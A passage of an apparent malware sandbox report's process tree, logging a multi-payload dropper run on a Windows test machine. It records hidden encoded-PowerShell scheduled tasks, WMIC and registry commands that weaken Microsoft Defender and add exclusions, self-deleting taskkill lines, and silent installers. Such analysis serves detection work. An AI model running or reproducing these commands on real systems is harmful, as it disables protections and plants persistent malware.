        schtasks /CREATE /TN "gbQFRyGUY" /SC once /ST 04:00:16 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        11⤵
        Creates scheduled task(s)
        
        PID:4576
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn "gbQFRyGUY"
        11⤵
        
        PID:4536
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /DELETE /F /TN "gbQFRyGUY"
        11⤵
        
        PID:4924
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bRciptYQhTCMvEFWGJ" /SC once /ST 05:10:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\nitzTrLPrXGkZCFFk\iXkrQovqyvDrylo\jyriYtZ.exe\" W8 /site_id 668658 /S" /V1 /F
        11⤵
        Creates scheduled task(s)
        
        PID:3540
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
        8⤵
        
        PID:4356
      - C:\Users\Admin\Documents\dZMsMKZgBGBQhqShGyzkfiYK.exe
        
        "C:\Users\Admin\Documents\dZMsMKZgBGBQhqShGyzkfiYK.exe"
        6⤵
        
        PID:2992
      - C:\Users\Admin\Documents\iAcjSOPol6Zs7BQJzJq61OGI.exe
        
        "C:\Users\Admin\Documents\iAcjSOPol6Zs7BQJzJq61OGI.exe"
        6⤵
        
        PID:3008
      - C:\Users\Admin\Documents\_M6vjYGkTU9A5vo4dgMIwiz8.exe
        
        "C:\Users\Admin\Documents\_M6vjYGkTU9A5vo4dgMIwiz8.exe"
        6⤵
        
        PID:2944
        
        C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
        
        "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
        7⤵
        
        PID:3168
        
        C:\Program Files (x86)\Company\NewProduct\cm3.exe
        
        "C:\Program Files (x86)\Company\NewProduct\cm3.exe"
        7⤵
        
        PID:3160
        
        C:\Program Files (x86)\Company\NewProduct\inst001.exe
        
        "C:\Program Files (x86)\Company\NewProduct\inst001.exe"
        7⤵
        
        PID:3244
      - C:\Users\Admin\Documents\ByrLAYmGVRkkJ3zMOYqNKqGl.exe
        
        "C:\Users\Admin\Documents\ByrLAYmGVRkkJ3zMOYqNKqGl.exe"
        6⤵
        
        PID:2892
      - C:\Users\Admin\Documents\uQUIXK9_7mz11eCUu2GuFHR9.exe
        
        "C:\Users\Admin\Documents\uQUIXK9_7mz11eCUu2GuFHR9.exe"
        6⤵
        
        PID:2800
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun19262b9e49ad.exe
      4⤵
      Loads dropped DLL
      PID:1316
    - - C:\Users\Admin\AppData\Local\Temp\7zS4B632923\Sun19262b9e49ad.exe
        
        Sun19262b9e49ad.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:984
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        6⤵
        
        PID:1936
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        7⤵
        Kills process with taskkill
        
        PID:3656
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun193fda712d9f1.exe
      4⤵
      Loads dropped DLL
      PID:1488
    - - C:\Users\Admin\AppData\Local\Temp\7zS4B632923\Sun193fda712d9f1.exe
        
        Sun193fda712d9f1.exe
        5⤵
        Executes dropped EXE
        
        PID:1036
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun19e4ade31b2a.exe
      4⤵
      Loads dropped DLL
      PID:856
    - - C:\Users\Admin\AppData\Local\Temp\7zS4B632923\Sun19e4ade31b2a.exe
        
        Sun19e4ade31b2a.exe
        5⤵
        Executes dropped EXE
        
        PID:2036
      - C:\Users\Admin\AppData\Roaming\4985996.scr
        
        "C:\Users\Admin\AppData\Roaming\4985996.scr" /S
        6⤵
        
        PID:2820
      - C:\Users\Admin\AppData\Roaming\3579070.scr
        
        "C:\Users\Admin\AppData\Roaming\3579070.scr" /S
        6⤵
        
        PID:3056
      - C:\Users\Admin\AppData\Roaming\2190861.scr
        
        "C:\Users\Admin\AppData\Roaming\2190861.scr" /S
        6⤵
        
        PID:2028
        
        C:\Users\Admin\AppData\Roaming\2190861.scr
        
        "C:\Users\Admin\AppData\Roaming\2190861.scr"
        7⤵
        
        PID:2384
        
        C:\Users\Admin\AppData\Roaming\2190861.scr
        
        "C:\Users\Admin\AppData\Roaming\2190861.scr"
        7⤵
        
        PID:1672
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2028 -s 780
        7⤵
        Program crash
        
        PID:1108
      - C:\Users\Admin\AppData\Roaming\4945762.scr
        
        "C:\Users\Admin\AppData\Roaming\4945762.scr" /S
        6⤵
        
        PID:1780
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun1908b94df837b3158.exe
      4⤵
      Loads dropped DLL
      PID:1708
    - - C:\Users\Admin\AppData\Local\Temp\7zS4B632923\Sun1908b94df837b3158.exe
        
        Sun1908b94df837b3158.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1764
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun19de8ff4b6aefeb8.exe /mixone
      4⤵
      Loads dropped DLL
      PID:1096
    - - C:\Users\Admin\AppData\Local\Temp\7zS4B632923\Sun19de8ff4b6aefeb8.exe
        
        Sun19de8ff4b6aefeb8.exe /mixone
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:704
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "Sun19de8ff4b6aefeb8.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS4B632923\Sun19de8ff4b6aefeb8.exe" & exit
        6⤵
        
        PID:1824
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "Sun19de8ff4b6aefeb8.exe" /f
        7⤵
        Kills process with taskkill
        
        PID:2228
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun191101c1aaa.exe
      4⤵
      Loads dropped DLL
      PID:1924
    - - C:\Users\Admin\AppData\Local\Temp\7zS4B632923\Sun191101c1aaa.exe
        
        Sun191101c1aaa.exe
        5⤵
        Executes dropped EXE
        
        PID:1172
      - C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
        6⤵
        
        PID:2848
        
        C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
        7⤵
        
        PID:2948
        
        C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe
        
        "C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"
        7⤵
        
        PID:2996
        
        C:\ProgramData\5483344.exe
        
        "C:\ProgramData\5483344.exe"
        8⤵
        
        PID:2220
        
        C:\ProgramData\3370718.exe
        
        "C:\ProgramData\3370718.exe"
        8⤵
        
        PID:3252
        
        C:\ProgramData\2065615.exe
        
        "C:\ProgramData\2065615.exe"
        8⤵
        
        PID:3440
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3440 -s 764
        9⤵
        Program crash
        
        PID:3984
        
        C:\ProgramData\2065615.exe
        
        "C:\ProgramData\2065615.exe"
        9⤵
        
        PID:3796
        
        C:\ProgramData\4251237.exe
        
        "C:\ProgramData\4251237.exe"
        8⤵
        
        PID:3248
        
        C:\Users\Admin\AppData\Local\Temp\2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2.exe"
        7⤵
        
        PID:3040
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 3040 -s 1428
        8⤵
        Program crash
        
        PID:2408
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        7⤵
        
        PID:1008
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup.exe" & exit
        8⤵
        
        PID:2112
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "setup.exe" /f
        9⤵
        Kills process with taskkill
        
        PID:4304
        
        C:\Users\Admin\AppData\Local\Temp\udptest.exe
        
        "C:\Users\Admin\AppData\Local\Temp\udptest.exe"
        7⤵
        
        PID:1844
        
        C:\Users\Admin\AppData\Local\Temp\5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\5.exe"
        7⤵
        
        PID:2344
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 2344 -s 1428
        8⤵
        Program crash
        
        PID:3744
        
        C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecF18.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecF18.exe"
        7⤵
        
        PID:2728
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 2728 -s 800
        8⤵
        Program crash
        
        PID:4124
        
        C:\Users\Admin\AppData\Local\Temp\setup_2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
        7⤵
        
        PID:2456
        
        C:\Users\Admin\AppData\Local\Temp\is-N63B7.tmp\setup_2.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-N63B7.tmp\setup_2.tmp" /SL5="$3010E,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
        8⤵
        
        PID:3576
        
        C:\Users\Admin\AppData\Local\Temp\setup_2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
        9⤵
        
        PID:3852
        
        C:\Users\Admin\AppData\Local\Temp\is-UBOV8.tmp\setup_2.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-UBOV8.tmp\setup_2.tmp" /SL5="$3022C,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
        10⤵
        
        PID:2260
        
        C:\Users\Admin\AppData\Local\Temp\is-1NRTF.tmp\postback.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-1NRTF.tmp\postback.exe" ss1
        11⤵
        
        PID:4780
        
        C:\Windows\SysWOW64\explorer.exe
        
        explorer.exe ss1
        12⤵
        
        PID:4440
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\hfNAOXRWo.dll"
        13⤵
        
        PID:4320
        
        C:\Windows\SysWOW64\regsvr32.exe
        
        regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\hfNAOXRWo.dll"
        14⤵
        
        PID:4904
        
        C:\Windows\system32\regsvr32.exe
        
        /s "C:\Users\Admin\AppData\Local\Temp\hfNAOXRWo.dll"
        15⤵
        
        PID:4832
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\hfNAOXRWo.dllgLnyzwmvz.dll"
        13⤵
        
        PID:5004
        
        C:\Windows\SysWOW64\regsvr32.exe
        
        regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\hfNAOXRWo.dllgLnyzwmvz.dll"
        14⤵
        
        PID:956
        
        C:\Users\Admin\AppData\Local\Temp\3002.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3002.exe"
        7⤵
        
        PID:3388
        
        C:\Users\Admin\AppData\Local\Temp\3002.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3002.exe" -a
        8⤵
        
        PID:3808
        
        C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
        
        "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
        7⤵
        
        PID:3564
        
        C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"
        7⤵
        
        PID:3824
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun19eb40faaaa9.exe
      4⤵
      PID:1092
    - - C:\Users\Admin\AppData\Local\Temp\7zS4B632923\Sun19eb40faaaa9.exe
        
        Sun19eb40faaaa9.exe
        5⤵
        
        PID:1040
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun198361825f4.exe
      4⤵
      Loads dropped DLL
      PID:1884
    - - C:\Users\Admin\AppData\Local\Temp\7zS4B632923\Sun198361825f4.exe
        
        Sun198361825f4.exe
        5⤵
        Executes dropped EXE
        
        PID:2136
      - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 2136 -s 792
        6⤵
        Program crash
        
        PID:2132
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun1966fb31dd5a07.exe
      4⤵
      Loads dropped DLL
      PID:432
    - - C:\Users\Admin\AppData\Local\Temp\7zS4B632923\Sun1966fb31dd5a07.exe
        
        Sun1966fb31dd5a07.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2108
      - C:\Users\Admin\AppData\Local\Temp\is-1N73J.tmp\Sun1966fb31dd5a07.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-1N73J.tmp\Sun1966fb31dd5a07.tmp" /SL5="$2015C,247014,163328,C:\Users\Admin\AppData\Local\Temp\7zS4B632923\Sun1966fb31dd5a07.exe"
        6⤵
        Executes dropped EXE
        
        PID:2320
        
        C:\Users\Admin\AppData\Local\Temp\is-8MHTM.tmp\Ze2ro.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-8MHTM.tmp\Ze2ro.exe" /S /UID=burnerch2
        7⤵
        
        PID:2564
        
        C:\Program Files\Windows Mail\SNBBYRJSUA\ultramediaburner.exe
        
        "C:\Program Files\Windows Mail\SNBBYRJSUA\ultramediaburner.exe" /VERYSILENT
        8⤵
        
        PID:2856
        
        C:\Users\Admin\AppData\Local\Temp\18-ea0f8-50a-838a2-ff6a1576b8888\Taeshobozhisae.exe
        
        "C:\Users\Admin\AppData\Local\Temp\18-ea0f8-50a-838a2-ff6a1576b8888\Taeshobozhisae.exe"
        8⤵
        
        PID:3052
        
        C:\Program Files\Internet Explorer\iexplore.exe
        
        "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
        9⤵
        
        PID:3420
        
        C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3420 CREDAT:275457 /prefetch:2
        10⤵
        
        PID:4032
        
        C:\Program Files\Internet Explorer\iexplore.exe
        
        "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
        9⤵
        
        PID:4132
        
        C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4132 CREDAT:275457 /prefetch:2
        10⤵
        
        PID:4852
        
        C:\Users\Admin\AppData\Local\Temp\9a-87681-0c2-0a487-69d118ed19f60\Nilykakacae.exe
        
        "C:\Users\Admin\AppData\Local\Temp\9a-87681-0c2-0a487-69d118ed19f60\Nilykakacae.exe"
        8⤵
        
        PID:2764
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ox5b4g3w.yuo\GcleanerEU.exe /eufive & exit
        9⤵
        
        PID:4172
        
        C:\Users\Admin\AppData\Local\Temp\ox5b4g3w.yuo\GcleanerEU.exe
        
        C:\Users\Admin\AppData\Local\Temp\ox5b4g3w.yuo\GcleanerEU.exe /eufive
        10⤵
        
        PID:3500
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "GcleanerEU.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\ox5b4g3w.yuo\GcleanerEU.exe" & exit
        11⤵
        
        PID:1772
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "GcleanerEU.exe" /f
        12⤵
        Kills process with taskkill
        
        PID:4548
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vmjetnwh.t5f\installer.exe /qn CAMPAIGN="654" & exit
        9⤵
        
        PID:3712
        
        C:\Users\Admin\AppData\Local\Temp\vmjetnwh.t5f\installer.exe
        
        C:\Users\Admin\AppData\Local\Temp\vmjetnwh.t5f\installer.exe /qn CAMPAIGN="654"
        10⤵
        
        PID:3524
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\21hlfz2q.iov\anyname.exe & exit
        9⤵
        
        PID:188
        
        C:\Users\Admin\AppData\Local\Temp\21hlfz2q.iov\anyname.exe
        
        C:\Users\Admin\AppData\Local\Temp\21hlfz2q.iov\anyname.exe
        10⤵
        
        PID:3256
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bpdb4wb0.e2z\gcleaner.exe /mixfive & exit
        9⤵
        
        PID:4772
        
        C:\Users\Admin\AppData\Local\Temp\bpdb4wb0.e2z\gcleaner.exe
        
        C:\Users\Admin\AppData\Local\Temp\bpdb4wb0.e2z\gcleaner.exe /mixfive
        10⤵
        
        PID:3940
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "gcleaner.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\bpdb4wb0.e2z\gcleaner.exe" & exit
        11⤵
        
        PID:3244
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "gcleaner.exe" /f
        12⤵
        Kills process with taskkill
        
        PID:4744
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun195a1614ec24e6a.exe
      4⤵
      Loads dropped DLL
      PID:2040
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun1905815e51282417.exe
      4⤵
      Loads dropped DLL
      PID:1636

C:\Users\Admin\AppData\Local\Temp\7zS4B632923\Sun1905815e51282417.exe
Sun1905815e51282417.exe
1⤵
- Executes dropped EXE
PID:1432

C:\Users\Admin\AppData\Local\Temp\7zS4B632923\Sun195a1614ec24e6a.exe
Sun195a1614ec24e6a.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1260

C:\Users\Admin\AppData\Local\Temp\is-7J8NP.tmp\ultramediaburner.tmp
"C:\Users\Admin\AppData\Local\Temp\is-7J8NP.tmp\ultramediaburner.tmp" /SL5="$70172,281924,62464,C:\Program Files\Windows Mail\SNBBYRJSUA\ultramediaburner.exe" /VERYSILENT
1⤵
PID:1072
- C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
  "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
  2⤵
  PID:4924

C:\Users\Admin\AppData\Local\Temp\E639.exe
C:\Users\Admin\AppData\Local\Temp\E639.exe
1⤵
PID:2828

C:\Users\Admin\AppData\Local\Temp\4F87.exe
C:\Users\Admin\AppData\Local\Temp\4F87.exe
1⤵
PID:2352
- C:\Users\Admin\AppData\Local\Temp\4F87.exe
  C:\Users\Admin\AppData\Local\Temp\4F87.exe
  2⤵
  PID:1356

C:\Users\Admin\AppData\Local\Temp\75AD.exe
C:\Users\Admin\AppData\Local\Temp\75AD.exe
1⤵
PID:1512

C:\Users\Admin\AppData\Local\Temp\DA4A.exe
C:\Users\Admin\AppData\Local\Temp\DA4A.exe
1⤵
PID:1184

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Local\41d3c0b4-c914-4466-99f0-706a827f0d76" /deny *S-1-1-0:(OI)(CI)(DE,DC)
1⤵
- Modifies file permissions
PID:3264

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1356 -s 1320
1⤵
- Program crash
PID:3012

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
PID:4116

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:676

C:\Users\Admin\AppData\Local\Temp\B445.exe
C:\Users\Admin\AppData\Local\Temp\B445.exe
1⤵
PID:4120

C:\Users\Admin\AppData\Local\Temp\86B1.exe
C:\Users\Admin\AppData\Local\Temp\86B1.exe
1⤵
PID:3632
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\86B1.exe"
  2⤵
  PID:4260
- - C:\Windows\SysWOW64\timeout.exe
    timeout /T 10 /NOBREAK
    3⤵
    - Delays execution with timeout.exe
    PID:3416

C:\Windows\system32\taskeng.exe
taskeng.exe {235994D0-218F-40FC-85B9-F086A2E3A2B6} S-1-5-21-2375386074-2889020035-839874990-1000:AFOWCZMM\Admin:Interactive:[1]
1⤵
PID:3740
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  PID:4532
- C:\Users\Admin\AppData\Roaming\fhhahbb
  C:\Users\Admin\AppData\Roaming\fhhahbb
  2⤵
  PID:4960
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  PID:3416

C:\Users\Admin\AppData\Local\Temp\nitzTrLPrXGkZCFFk\iXkrQovqyvDrylo\jyriYtZ.exe
C:\Users\Admin\AppData\Local\Temp\nitzTrLPrXGkZCFFk\iXkrQovqyvDrylo\jyriYtZ.exe W8 /site_id 668658 /S
1⤵
PID:4664
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &
  2⤵
  PID:4428
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
    3⤵
    PID:2512
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
      4⤵
      PID:912
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
        5⤵
        
        PID:2288
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
        6⤵
        
        PID:4588
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
    3⤵
    PID:1040
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"
    3⤵
    PID:2512
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
      4⤵
      PID:956
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
        5⤵
        
        PID:4344
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
        6⤵
        
        PID:2436
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"
    3⤵
    PID:4384
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gBBsqFqgL" /SC once /ST 00:42:01 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  2⤵
  - Creates scheduled task(s)
  PID:3108
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "gBBsqFqgL"
  2⤵
  PID:1116
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gBBsqFqgL"
  2⤵
  PID:4452
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\nyFjvKGtfVGLAKAU" /t REG_DWORD /d 0 /reg:32
  2⤵
  PID:3808
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\nyFjvKGtfVGLAKAU" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5036
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\nyFjvKGtfVGLAKAU" /t REG_DWORD /d 0 /reg:64
  2⤵
  PID:1116
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\nyFjvKGtfVGLAKAU" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:3404
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\nyFjvKGtfVGLAKAU" /t REG_DWORD /d 0 /reg:32
  2⤵
  PID:4548
- - C:\Windows\SysWOW64\reg.exe
